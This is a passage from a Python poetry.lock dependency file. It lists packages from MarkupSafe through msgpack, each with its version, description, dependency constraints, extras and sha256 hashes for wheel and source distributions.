{file = "MarkupSafe-2.1.3-cp310-cp310-win_amd64.whl", hash = "sha256:1577735524cdad32f9f694208aa75e422adba74f1baee7551620e43a3141f559"},
{file = "MarkupSafe-2.1.3-cp311-cp311-macosx_10_9_universal2.whl", hash = "sha256:ad9e82fb8f09ade1c3e1b996a6337afac2b8b9e365f926f5a61aacc71adc5b3c"},
{file = "MarkupSafe-2.1.3-cp311-cp311-macosx_10_9_x86_64.whl", hash = "sha256:3c0fae6c3be832a0a0473ac912810b2877c8cb9d76ca48de1ed31e1c68386575"},
{file = "MarkupSafe-2.1.3-cp311-cp311-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:b076b6226fb84157e3f7c971a47ff3a679d837cf338547532ab866c57930dbee"},
{file = "MarkupSafe-2.1.3-cp311-cp311-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:bfce63a9e7834b12b87c64d6b155fdd9b3b96191b6bd334bf37db7ff1fe457f2"},
{file = "MarkupSafe-2.1.3-cp311-cp311-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:338ae27d6b8745585f87218a3f23f1512dbf52c26c28e322dbe54bcede54ccb9"},
{file = "MarkupSafe-2.1.3-cp311-cp311-musllinux_1_1_aarch64.whl", hash = "sha256:e4dd52d80b8c83fdce44e12478ad2e85c64ea965e75d66dbeafb0a3e77308fcc"},
{file = "MarkupSafe-2.1.3-cp311-cp311-musllinux_1_1_i686.whl", hash = "sha256:df0be2b576a7abbf737b1575f048c23fb1d769f267ec4358296f31c2479db8f9"},
{file = "MarkupSafe-2.1.3-cp311-cp311-musllinux_1_1_x86_64.whl", hash = "sha256:5bbe06f8eeafd38e5d0a4894ffec89378b6c6a625ff57e3028921f8ff59318ac"},
{file = "MarkupSafe-2.1.3-cp311-cp311-win32.whl", hash = "sha256:dd15ff04ffd7e05ffcb7fe79f1b98041b8ea30ae9234aed2a9168b5797c3effb"},
{file = "MarkupSafe-2.1.3-cp311-cp311-win_amd64.whl", hash = "sha256:134da1eca9ec0ae528110ccc9e48041e0828d79f24121a1a146161103c76e686"},
{file = "MarkupSafe-2.1.3-cp312-cp312-macosx_10_9_universal2.whl", hash = "sha256:f698de3fd0c4e6972b92290a45bd9b1536bffe8c6759c62471efaa8acb4c37bc"},
{file = "MarkupSafe-2.1.3-cp312-cp312-macosx_10_9_x86_64.whl", hash = "sha256:aa57bd9cf8ae831a362185ee444e15a93ecb2e344c8e52e4d721ea3ab6ef1823"},
{file = "MarkupSafe-2.1.3-cp312-cp312-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:ffcc3f7c66b5f5b7931a5aa68fc9cecc51e685ef90282f4a82f0f5e9b704ad11"},
{file = "MarkupSafe-2.1.3-cp312-cp312-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:47d4f1c5f80fc62fdd7777d0d40a2e9dda0a05883ab11374334f6c4de38adffd"},
{file = "MarkupSafe-2.1.3-cp312-cp312-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:1f67c7038d560d92149c060157d623c542173016c4babc0c1913cca0564b9939"},
{file = "MarkupSafe-2.1.3-cp312-cp312-musllinux_1_1_aarch64.whl", hash = "sha256:9aad3c1755095ce347e26488214ef77e0485a3c34a50c5a5e2471dff60b9dd9c"},
{file = "MarkupSafe-2.1.3-cp312-cp312-musllinux_1_1_i686.whl", hash = "sha256:14ff806850827afd6b07a5f32bd917fb7f45b046ba40c57abdb636674a8b559c"},
{file = "MarkupSafe-2.1.3-cp312-cp312-musllinux_1_1_x86_64.whl", hash = "sha256:8f9293864fe09b8149f0cc42ce56e3f0e54de883a9de90cd427f191c346eb2e1"},
{file = "MarkupSafe-2.1.3-cp312-cp312-win32.whl", hash = "sha256:715d3562f79d540f251b99ebd6d8baa547118974341db04f5ad06d5ea3eb8007"},
{file = "MarkupSafe-2.1.3-cp312-cp312-win_amd64.whl", hash = "sha256:1b8dd8c3fd14349433c79fa8abeb573a55fc0fdd769133baac1f5e07abf54aeb"},
{file = "MarkupSafe-2.1.3-cp37-cp37m-macosx_10_9_x86_64.whl", hash = "sha256:8e254ae696c88d98da6555f5ace2279cf7cd5b3f52be2b5cf97feafe883b58d2"},
{file = "MarkupSafe-2.1.3-cp37-cp37m-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:cb0932dc158471523c9637e807d9bfb93e06a95cbf010f1a38b98623b929ef2b"},
{file = "MarkupSafe-2.1.3-cp37-cp37m-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:9402b03f1a1b4dc4c19845e5c749e3ab82d5078d16a2a4c2cd2df62d57bb0707"},
{file = "MarkupSafe-2.1.3-cp37-cp37m-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:ca379055a47383d02a5400cb0d110cef0a776fc644cda797db0c5696cfd7e18e"},
{file = "MarkupSafe-2.1.3-cp37-cp37m-musllinux_1_1_aarch64.whl", hash = "sha256:b7ff0f54cb4ff66dd38bebd335a38e2c22c41a8ee45aa608efc890ac3e3931bc"},
{file = "MarkupSafe-2.1.3-cp37-cp37m-musllinux_1_1_i686.whl", hash = "sha256:c011a4149cfbcf9f03994ec2edffcb8b1dc2d2aede7ca243746df97a5d41ce48"},
{file = "MarkupSafe-2.1.3-cp37-cp37m-musllinux_1_1_x86_64.whl", hash = "sha256:56d9f2ecac662ca1611d183feb03a3fa4406469dafe241673d521dd5ae92a155"},
{file = "MarkupSafe-2.1.3-cp37-cp37m-win32.whl", hash = "sha256:8758846a7e80910096950b67071243da3e5a20ed2546e6392603c096778d48e0"},
{file = "MarkupSafe-2.1.3-cp37-cp37m-win_amd64.whl", hash = "sha256:787003c0ddb00500e49a10f2844fac87aa6ce977b90b0feaaf9de23c22508b24"},
{file = "MarkupSafe-2.1.3-cp38-cp38-macosx_10_9_universal2.whl", hash = "sha256:2ef12179d3a291be237280175b542c07a36e7f60718296278d8593d21ca937d4"},
{file = "MarkupSafe-2.1.3-cp38-cp38-macosx_10_9_x86_64.whl", hash = "sha256:2c1b19b3aaacc6e57b7e25710ff571c24d6c3613a45e905b1fde04d691b98ee0"},
{file = "MarkupSafe-2.1.3-cp38-cp38-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:8afafd99945ead6e075b973fefa56379c5b5c53fd8937dad92c662da5d8fd5ee"},
{file = "MarkupSafe-2.1.3-cp38-cp38-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:8c41976a29d078bb235fea9b2ecd3da465df42a562910f9022f1a03107bd02be"},
{file = "MarkupSafe-2.1.3-cp38-cp38-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:d080e0a5eb2529460b30190fcfcc4199bd7f827663f858a226a81bc27beaa97e"},
{file = "MarkupSafe-2.1.3-cp38-cp38-musllinux_1_1_aarch64.whl", hash = "sha256:69c0f17e9f5a7afdf2cc9fb2d1ce6aabdb3bafb7f38017c0b77862bcec2bbad8"},
{file = "MarkupSafe-2.1.3-cp38-cp38-musllinux_1_1_i686.whl", hash = "sha256:504b320cd4b7eff6f968eddf81127112db685e81f7e36e75f9f84f0df46041c3"},
{file = "MarkupSafe-2.1.3-cp38-cp38-musllinux_1_1_x86_64.whl", hash = "sha256:42de32b22b6b804f42c5d98be4f7e5e977ecdd9ee9b660fda1a3edf03b11792d"},
{file = "MarkupSafe-2.1.3-cp38-cp38-win32.whl", hash = "sha256:ceb01949af7121f9fc39f7d27f91be8546f3fb112c608bc4029aef0bab86a2a5"},
{file = "MarkupSafe-2.1.3-cp38-cp38-win_amd64.whl", hash = "sha256:1b40069d487e7edb2676d3fbdb2b0829ffa2cd63a2ec26c4938b2d34391b4ecc"},
{file = "MarkupSafe-2.1.3-cp39-cp39-macosx_10_9_universal2.whl", hash = "sha256:8023faf4e01efadfa183e863fefde0046de576c6f14659e8782065bcece22198"},
{file = "MarkupSafe-2.1.3-cp39-cp39-macosx_10_9_x86_64.whl", hash = "sha256:6b2b56950d93e41f33b4223ead100ea0fe11f8e6ee5f641eb753ce4b77a7042b"},
{file = "MarkupSafe-2.1.3-cp39-cp39-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:9dcdfd0eaf283af041973bff14a2e143b8bd64e069f4c383416ecd79a81aab58"},
{file = "MarkupSafe-2.1.3-cp39-cp39-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:05fb21170423db021895e1ea1e1f3ab3adb85d1c2333cbc2310f2a26bc77272e"},
{file = "MarkupSafe-2.1.3-cp39-cp39-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:282c2cb35b5b673bbcadb33a585408104df04f14b2d9b01d4c345a3b92861c2c"},
{file = "MarkupSafe-2.1.3-cp39-cp39-musllinux_1_1_aarch64.whl", hash = "sha256:ab4a0df41e7c16a1392727727e7998a467472d0ad65f3ad5e6e765015df08636"},
{file = "MarkupSafe-2.1.3-cp39-cp39-musllinux_1_1_i686.whl", hash = "sha256:7ef3cb2ebbf91e330e3bb937efada0edd9003683db6b57bb108c4001f37a02ea"},
{file = "MarkupSafe-2.1.3-cp39-cp39-musllinux_1_1_x86_64.whl", hash = "sha256:0a4e4a1aff6c7ac4cd55792abf96c915634c2b97e3cc1c7129578aa68ebd754e"},
{file = "MarkupSafe-2.1.3-cp39-cp39-win32.whl", hash = "sha256:fec21693218efe39aa7f8599346e90c705afa52c5b31ae019b2e57e8f6542bb2"},
{file = "MarkupSafe-2.1.3-cp39-cp39-win_amd64.whl", hash = "sha256:3fd4abcb888d15a94f32b75d8fd18ee162ca0c064f35b11134be77050296d6ba"},
{file = "MarkupSafe-2.1.3.tar.gz", hash = "sha256:af598ed32d6ae86f1b747b82783958b1a4ab8f617b06fe68795c7f026abbdcad"},
]
[[package]]
name = "marqo"
version = "1.3.1"
description = "Tensor search for humans"
optional = true
python-versions = ">=3"
files = [
{file = "marqo-1.3.1-py3-none-any.whl", hash = "sha256:32b1eb95dcd53027277b5f9704bb4a1db29f0c113b487df56dfdc63ef5805f47"},
{file = "marqo-1.3.1.tar.gz", hash = "sha256:d2bab35df93ee7790d10dac459620dcd1133332d0a693046d0aebf17994cf8ac"},
]
[package.dependencies]
packaging = "*"
pydantic = "<2.0.0"
requests = "*"
typing-extensions = ">=4.5.0"
urllib3 = "*"
[[package]]
name = "marshmallow"
version = "3.20.1"
description = "A lightweight library for converting complex datatypes to and from native Python datatypes."
optional = false
python-versions = ">=3.8"
files = [
{file = "marshmallow-3.20.1-py3-none-any.whl", hash = "sha256:684939db93e80ad3561392f47be0230743131560a41c5110684c16e21ade0a5c"},
{file = "marshmallow-3.20.1.tar.gz", hash = "sha256:5d2371bbe42000f2b3fb5eaa065224df7d8f8597bc19a1bbfa5bfe7fba8da889"},
]
[package.dependencies]
packaging = ">=17.0"
[package.extras]
dev = ["flake8 (==6.0.0)", "flake8-bugbear (==23.7.10)", "mypy (==1.4.1)", "pre-commit (>=2.4,<4.0)", "pytest", "pytz", "simplejson", "tox"]
docs = ["alabaster (==0.7.13)", "autodocsumm (==0.2.11)", "sphinx (==7.0.1)", "sphinx-issues (==3.0.1)", "sphinx-version-warning (==1.1.2)"]
lint = ["flake8 (==6.0.0)", "flake8-bugbear (==23.7.10)", "mypy (==1.4.1)", "pre-commit (>=2.4,<4.0)"]
tests = ["pytest", "pytz", "simplejson"]
[[package]]
name = "matplotlib-inline"
version = "0.1.6"
description = "Inline Matplotlib backend for Jupyter"
optional = false
python-versions = ">=3.5"
files = [
{file = "matplotlib-inline-0.1.6.tar.gz", hash = "sha256:f887e5f10ba98e8d2b150ddcf4702c1e5f8b3a20005eb0f74bfdbd360ee6f304"},
{file = "matplotlib_inline-0.1.6-py3-none-any.whl", hash = "sha256:f1f41aab5328aa5aaea9b16d083b128102f8712542f819fe7e6a420ff581b311"},
]
[package.dependencies]
traitlets = "*"
[[package]]
name = "mdurl"
version = "0.1.2"
description = "Markdown URL utilities"
optional = true
python-versions = ">=3.7"
files = [
{file = "mdurl-0.1.2-py3-none-any.whl", hash = "sha256:84008a41e51615a49fc9966191ff91509e3c40b939176e643fd50a5c2196b8f8"},
{file = "mdurl-0.1.2.tar.gz", hash = "sha256:bb413d29f5eea38f31dd4754dd7377d4465116fb207585f97bf925588687c1ba"},
]
[[package]]
name = "mistune"
version = "3.0.2"
description = "A sane and fast Markdown parser with useful plugins and renderers"
optional = false
python-versions = ">=3.7"
files = [
{file = "mistune-3.0.2-py3-none-any.whl", hash = "sha256:71481854c30fdbc938963d3605b72501f5c10a9320ecd412c121c163a1c7d205"},
{file = "mistune-3.0.2.tar.gz", hash = "sha256:fc7f93ded930c92394ef2cb6f04a8aabab4117a91449e72dcc8dfa646a508be8"},
]
[[package]]
name = "mmh3"
version = "3.1.0"
description = "Python wrapper for MurmurHash (MurmurHash3), a set of fast and robust hash functions."
optional = true
python-versions = "*"
files = [
{file = "mmh3-3.1.0-cp310-cp310-macosx_10_9_x86_64.whl", hash = "sha256:16ee043b1bac040b4324b8baee39df9fdca480a560a6d74f2eef66a5009a234e"},
{file = "mmh3-3.1.0-cp310-cp310-macosx_11_0_arm64.whl", hash = "sha256:04ac865319e5b36148a4b6cdf27f8bda091c47c4ab7b355d7f353dfc2b8a3cce"},
{file = "mmh3-3.1.0-cp310-cp310-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:9e751f5433417a21c2060b0efa1afc67cfbe29977c867336148c8edb086fae70"},
{file = "mmh3-3.1.0-cp310-cp310-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:bdb863b89c1b34e3681d4a3b15d424734940eb8036f3457cb35ef34fb87a503c"},
{file = "mmh3-3.1.0-cp310-cp310-manylinux_2_5_x86_64.manylinux1_x86_64.manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:1230930fbf2faec4ddf5b76d0768ae73c102de173c301962bdd468177275adf9"},
{file = "mmh3-3.1.0-cp310-cp310-win32.whl", hash = "sha256:b8ed7a2361718795a1b519a08d05f44947a20b27e202b53946561a00dde669c1"},
{file = "mmh3-3.1.0-cp310-cp310-win_amd64.whl", hash = "sha256:29e878e7467a000f34ab68c218ad7ad81312c0a94bc10df3c50a48bcad39dd83"},
{file = "mmh3-3.1.0-cp311-cp311-macosx_10_9_x86_64.whl", hash = "sha256:c271472325b70d64a4fbb1f2e964ca5b093ac10258e1390f8408890b065868fe"},
{file = "mmh3-3.1.0-cp311-cp311-macosx_11_0_arm64.whl", hash = "sha256:0109320f7e0e262123ff4f1acd06acfbc8b3bf19cc13d98c0bc369264430aaeb"},
{file = "mmh3-3.1.0-cp311-cp311-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:524e29dfe66499695f9496edcfc96782d130aabd6ba12c50c72372163cc6f3ea"},
{file = "mmh3-3.1.0-cp311-cp311-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:66bdb06a03074e65e614da1aa199b1d16c90608bec9d8fc3faa81d887ffe93cc"},
{file = "mmh3-3.1.0-cp311-cp311-manylinux_2_5_x86_64.manylinux1_x86_64.manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:2a4d471eb75df8320061ab3b8cbe11c970be9f116b01bc2222ebda9c0a777520"},
{file = "mmh3-3.1.0-cp311-cp311-win32.whl", hash = "sha256:a886d9ce995a4bdfd7a600ddf61b9015cccbc73c50b898f8ff3c78af24384710"},
{file = "mmh3-3.1.0-cp311-cp311-win_amd64.whl", hash = "sha256:5edb5ac882c04aff8a2a18ae8b74a0c339ac9b83db9820d8456f518bb558e0d8"},
{file = "mmh3-3.1.0-cp37-cp37m-macosx_10_9_x86_64.whl", hash = "sha256:190fd10981fbd6c67e10ce3b56bcc021562c0df0fee2e2864347d64e65b1783a"},
{file = "mmh3-3.1.0-cp37-cp37m-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:cd781b115cf649811cfde76368c33d2e553b6f88bb41131c314f30d8e65e9d24"},
{file = "mmh3-3.1.0-cp37-cp37m-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:f48bb0a867077acc1f548591ad49506389f36d18f36dccd10becf071e5cbdda4"},
{file = "mmh3-3.1.0-cp37-cp37m-manylinux_2_5_x86_64.manylinux1_x86_64.manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:7d0936a82438e340636a11b9a938378870fc1c7a139632dac09a9a9277351704"},
{file = "mmh3-3.1.0-cp37-cp37m-win32.whl", hash = "sha256:d196cc035c2238493248522ae4e54c3cb790549b1564f6dea4d88dfe4b326313"},
{file = "mmh3-3.1.0-cp37-cp37m-win_amd64.whl", hash = "sha256:731d37f089b6c212fab1beea24e673161146eb6c76baf9ac074a3424d1172d41"},
{file = "mmh3-3.1.0-cp38-cp38-macosx_10_9_x86_64.whl", hash = "sha256:9977fb81f8c66f4eee8439734a18dba7826fe78723d15ab53f42db977005be0f"},
{file = "mmh3-3.1.0-cp38-cp38-macosx_11_0_arm64.whl", hash = "sha256:bf4f3f20a8b8405c08b13bc9e4ac33bf55129b50b535cd07ce1891b7f96326ac"},
{file = "mmh3-3.1.0-cp38-cp38-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:87cdbc6e70099ad92f17a28b4054ffb1938657e8fb7c1e4e03b194a1b4683fd6"},
{file = "mmh3-3.1.0-cp38-cp38-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:6dd81321d14f62aa3711f30533c85a74dc7596e0fee63c8eddd375bc92ab846c"},
{file = "mmh3-3.1.0-cp38-cp38-manylinux_2_5_x86_64.manylinux1_x86_64.manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:2e6eba88e5c1a2778f3de00a9502e3c214ebb757337ece2a7d71e060d188ddfa"},
{file = "mmh3-3.1.0-cp38-cp38-win32.whl", hash = "sha256:d91e696925f208d28f3bb7bdf29815524ce955248276af256519bd3538c411ce"},
{file = "mmh3-3.1.0-cp38-cp38-win_amd64.whl", hash = "sha256:cbc2917df568aeb86ec5aa863bfb20fa14e01039cbdce7650efbabc30960df49"},
{file = "mmh3-3.1.0-cp39-cp39-macosx_10_9_x86_64.whl", hash = "sha256:3b22832d565128be83d69f5d49243bb567840a954df377c9f5b26646a6eec39b"},
{file = "mmh3-3.1.0-cp39-cp39-macosx_11_0_arm64.whl", hash = "sha256:ced92a0e285a9111413541c197b0c17d280cee96f7c564b258caf5de5ab8ee01"},
{file = "mmh3-3.1.0-cp39-cp39-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:f906833753b4ddcb690c2c1b74e77725868bc3a8b762b7a77737d08be89ae41d"},
{file = "mmh3-3.1.0-cp39-cp39-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:72b5685832a7a87a55ebff481794bc410484d7bd4c5e80dae4d8ac50739138ef"},
{file = "mmh3-3.1.0-cp39-cp39-manylinux_2_5_x86_64.manylinux1_x86_64.manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:8d2aa4d422c7c088bbc5d367b45431268ebe6742a0a64eade93fab708e25757c"},
{file = "mmh3-3.1.0-cp39-cp39-win32.whl", hash = "sha256:4459bec818f534dc8378568ad89ab310ff47cda3e00ab322edce48dd899bba32"},
{file = "mmh3-3.1.0-cp39-cp39-win_amd64.whl", hash = "sha256:03e04b3480e71828f48d17653451a3286555f0534942cb6ba93065b10ad5f9dc"},
{file = "mmh3-3.1.0.tar.gz", hash = "sha256:9b0f2b2ab4a915333c9d1089572e290a021ebb5b900bb7f7114dccc03995d732"},
]
[[package]]
name = "momento"
version = "1.12.0"
description = "SDK for Momento"
optional = true
python-versions = ">=3.7,<4.0"
files = [
{file = "momento-1.12.0-py3-none-any.whl", hash = "sha256:1dcb3ebadba67bc5e49337c433119d3857ff2e1e36627a8fcdadcc5db9a2f785"},
{file = "momento-1.12.0.tar.gz", hash = "sha256:31918c4e56b8db2f632a465c3a7df656666b8dab9efdcd49c61f3451d7bc481d"},
]
[package.dependencies]
grpcio = ">=1.46.0,<2.0.0"
momento-wire-types = ">=0.86.0,<0.87.0"
pyjwt = ">=2.4.0,<3.0.0"
[[package]]
name = "momento-wire-types"
version = "0.86.0"
description = "Momento Client Proto Generated Files"
optional = true
python-versions = ">=3.7,<4.0"
files = [
{file = "momento_wire_types-0.86.0-py3-none-any.whl", hash = "sha256:1079f61f3a0aa90865870b116a8699289e6f03b969a349265abdd605b073251c"},
{file = "momento_wire_types-0.86.0.tar.gz", hash = "sha256:7695a448382fbfda8ad7a51c307b34a2ef3d81d883f77b71891c27a4c25aed18"},
]
[package.dependencies]
grpcio = "*"
protobuf = ">=3,<5"
[[package]]
name = "more-itertools"
version = "10.1.0"
description = "More routines for operating on iterables, beyond itertools"
optional = true
python-versions = ">=3.8"
files = [
{file = "more-itertools-10.1.0.tar.gz", hash = "sha256:626c369fa0eb37bac0291bce8259b332fd59ac792fa5497b59837309cd5b114a"},
{file = "more_itertools-10.1.0-py3-none-any.whl", hash = "sha256:64e0735fcfdc6f3464ea133afe8ea4483b1c5fe3a3d69852e6503b43a0b222e6"},
]
[[package]]
name = "motor"
version = "3.3.1"
description = "Non-blocking MongoDB driver for Tornado or asyncio"
optional = true
python-versions = ">=3.7"
files = [
{file = "motor-3.3.1-py3-none-any.whl", hash = "sha256:a0dee83ad0d47b353932ac37467ba397b1e649ce7e3eea7f5a90554883d7cdbe"},
{file = "motor-3.3.1.tar.gz", hash = "sha256:c5eb400e27d722a3db03a9826656b6d13acf9b6c70c2fb4604f474eac9da5be4"},
]
[package.dependencies]
pymongo = ">=4.5,<5"
[package.extras]
aws = ["pymongo[aws] (>=4.5,<5)"]
encryption = ["pymongo[encryption] (>=4.5,<5)"]
gssapi = ["pymongo[gssapi] (>=4.5,<5)"]
ocsp = ["pymongo[ocsp] (>=4.5,<5)"]
snappy = ["pymongo[snappy] (>=4.5,<5)"]
srv = ["pymongo[srv] (>=4.5,<5)"]
test = ["aiohttp", "mockupdb", "motor[encryption]", "pytest (>=7)", "tornado (>=5)"]
zstd = ["pymongo[zstd] (>=4.5,<5)"]
[[package]]
name = "mpmath"
version = "1.3.0"
description = "Python library for arbitrary-precision floating-point arithmetic"
optional = true
python-versions = "*"
files = [
{file = "mpmath-1.3.0-py3-none-any.whl", hash = "sha256:a0b2b9fe80bbcd81a6647ff13108738cfb482d481d826cc0e02f5b35e5c88d2c"},
{file = "mpmath-1.3.0.tar.gz", hash = "sha256:7a28eb2a9774d00c7bc92411c19a89209d5da7c4c9a9e227be8330a23a25b91f"},
]
[package.extras]
develop = ["codecov", "pycodestyle", "pytest (>=4.6)", "pytest-cov", "wheel"]
docs = ["sphinx"]
gmpy = ["gmpy2 (>=2.1.0a4)"]
tests = ["pytest (>=4.6)"]
[[package]]
name = "msal"
version = "1.24.1"
description = "The Microsoft Authentication Library (MSAL) for Python library"
optional = true
python-versions = ">=2.7"
files = [
{file = "msal-1.24.1-py2.py3-none-any.whl", hash = "sha256:ce4320688f95c301ee74a4d0e9dbcfe029a63663a8cc61756f40d0d0d36574ad"},
{file = "msal-1.24.1.tar.gz", hash = "sha256:aa0972884b3c6fdec53d9a0bd15c12e5bd7b71ac1b66d746f54d128709f3f8f8"},
]
[package.dependencies]
cryptography = ">=0.6,<44"
PyJWT = {version = ">=1.0.0,<3", extras = ["crypto"]}
requests = ">=2.0.0,<3"
[package.extras]
broker = ["pymsalruntime (>=0.13.2,<0.14)"]
[[package]]
name = "msal-extensions"
version = "1.0.0"
description = "Microsoft Authentication Library extensions (MSAL EX) provides a persistence API that can save your data on disk, encrypted on Windows, macOS and Linux. Concurrent data access will be coordinated by a file lock mechanism."
optional = true
python-versions = "*"
files = [
{file = "msal-extensions-1.0.0.tar.gz", hash = "sha256:c676aba56b0cce3783de1b5c5ecfe828db998167875126ca4b47dc6436451354"},
{file = "msal_extensions-1.0.0-py2.py3-none-any.whl", hash = "sha256:91e3db9620b822d0ed2b4d1850056a0f133cba04455e62f11612e40f5502f2ee"},
]
[package.dependencies]
msal = ">=0.4.1,<2.0.0"
portalocker = [
{version = ">=1.0,<3", markers = "python_version >= \"3.5\" and platform_system != \"Windows\""},
{version = ">=1.6,<3", markers = "python_version >= \"3.5\" and platform_system == \"Windows\""},
]
[[package]]
name = "msgpack"
version = "1.0.7"
description = "MessagePack serializer"
optional = true
python-versions = ">=3.8"
files = [
{file = "msgpack-1.0.7-cp310-cp310-macosx_10_9_universal2.whl", hash = "sha256:04ad6069c86e531682f9e1e71b71c1c3937d6014a7c3e9edd2aa81ad58842862"},
{file = "msgpack-1.0.7-cp310-cp310-macosx_10_9_x86_64.whl", hash = "sha256:cca1b62fe70d761a282496b96a5e51c44c213e410a964bdffe0928e611368329"},
{file = "msgpack-1.0.7-cp310-cp310-macosx_11_0_arm64.whl", hash = "sha256:e50ebce52f41370707f1e21a59514e3375e3edd6e1832f5e5235237db933c98b"},
{file = "msgpack-1.0.7-cp310-cp310-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:4a7b4f35de6a304b5533c238bee86b670b75b03d31b7797929caa7a624b5dda6"},
{file = "msgpack-1.0.7-cp310-cp310-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:28efb066cde83c479dfe5a48141a53bc7e5f13f785b92ddde336c716663039ee"},
{file = "msgpack-1.0.7-cp310-cp310-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:4cb14ce54d9b857be9591ac364cb08dc2d6a5c4318c1182cb1d02274029d590d"},
{file = "msgpack-1.0.7-cp310-cp310-musllinux_1_1_aarch64.whl", hash = "sha256:b573a43ef7c368ba4ea06050a957c2a7550f729c31f11dd616d2ac4aba99888d"},
{file = "msgpack-1.0.7-cp310-cp310-musllinux_1_1_i686.whl", hash = "sha256:ccf9a39706b604d884d2cb1e27fe973bc55f2890c52f38df742bc1d79ab9f5e1"},
{file = "msgpack-1.0.7-cp310-cp310-musllinux_1_1_x86_64.whl", hash = "sha256:cb70766519500281815dfd7a87d3a178acf7ce95390544b8c90587d76b227681"},
{file = "msgpack-1.0.7-cp310-cp310-win32.whl", hash = "sha256:b610ff0f24e9f11c9ae653c67ff8cc03c075131401b3e5ef4b82570d1728f8a9"},
{file = "msgpack-1.0.7-cp310-cp310-win_amd64.whl", hash = "sha256:a40821a89dc373d6427e2b44b572efc36a2778d3f543299e2f24eb1a5de65415"},
{file = "msgpack-1.0.7-cp311-cp311-macosx_10_9_universal2.whl", hash = "sha256:576eb384292b139821c41995523654ad82d1916da6a60cff129c715a6223ea84"},
{file = "msgpack-1.0.7-cp311-cp311-macosx_10_9_x86_64.whl", hash = "sha256:730076207cb816138cf1af7f7237b208340a2c5e749707457d70705715c93b93"},
{file = "msgpack-1.0.7-cp311-cp311-macosx_11_0_arm64.whl", hash = "sha256:85765fdf4b27eb5086f05ac0491090fc76f4f2b28e09d9350c31aac25a5aaff8"},
{file = "msgpack-1.0.7-cp311-cp311-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:3476fae43db72bd11f29a5147ae2f3cb22e2f1a91d575ef130d2bf49afd21c46"},
{file = "msgpack-1.0.7-cp311-cp311-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:6d4c80667de2e36970ebf74f42d1088cc9ee7ef5f4e8c35eee1b40eafd33ca5b"},
{file = "msgpack-1.0.7-cp311-cp311-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:5b0bf0effb196ed76b7ad883848143427a73c355ae8e569fa538365064188b8e"},
{file = "msgpack-1.0.7-cp311-cp311-musllinux_1_1_aarch64.whl", hash = "sha256:f9a7c509542db4eceed3dcf21ee5267ab565a83555c9b88a8109dcecc4709002"},
{file = "msgpack-1.0.7-cp311-cp311-musllinux_1_1_i686.whl", hash = "sha256:84b0daf226913133f899ea9b30618722d45feffa67e4fe867b0b5ae83a34060c"},
{file = "msgpack-1.0.7-cp311-cp311-musllinux_1_1_x86_64.whl", hash = "sha256:ec79ff6159dffcc30853b2ad612ed572af86c92b5168aa3fc01a67b0fa40665e"},
{file = "msgpack-1.0.7-cp311-cp311-win32.whl", hash = "sha256:3e7bf4442b310ff154b7bb9d81eb2c016b7d597e364f97d72b1acc3817a0fdc1"},
{file = "msgpack-1.0.7-cp311-cp311-win_amd64.whl", hash = "sha256:3f0c8c6dfa6605ab8ff0611995ee30d4f9fcff89966cf562733b4008a3d60d82"},
{file = "msgpack-1.0.7-cp312-cp312-macosx_10_9_universal2.whl", hash = "sha256:f0936e08e0003f66bfd97e74ee530427707297b0d0361247e9b4f59ab78ddc8b"},
{file = "msgpack-1.0.7-cp312-cp312-macosx_10_9_x86_64.whl", hash = "sha256:98bbd754a422a0b123c66a4c341de0474cad4a5c10c164ceed6ea090f3563db4"},
{file = "msgpack-1.0.7-cp312-cp312-macosx_11_0_arm64.whl", hash = "sha256:b291f0ee7961a597cbbcc77709374087fa2a9afe7bdb6a40dbbd9b127e79afee"},
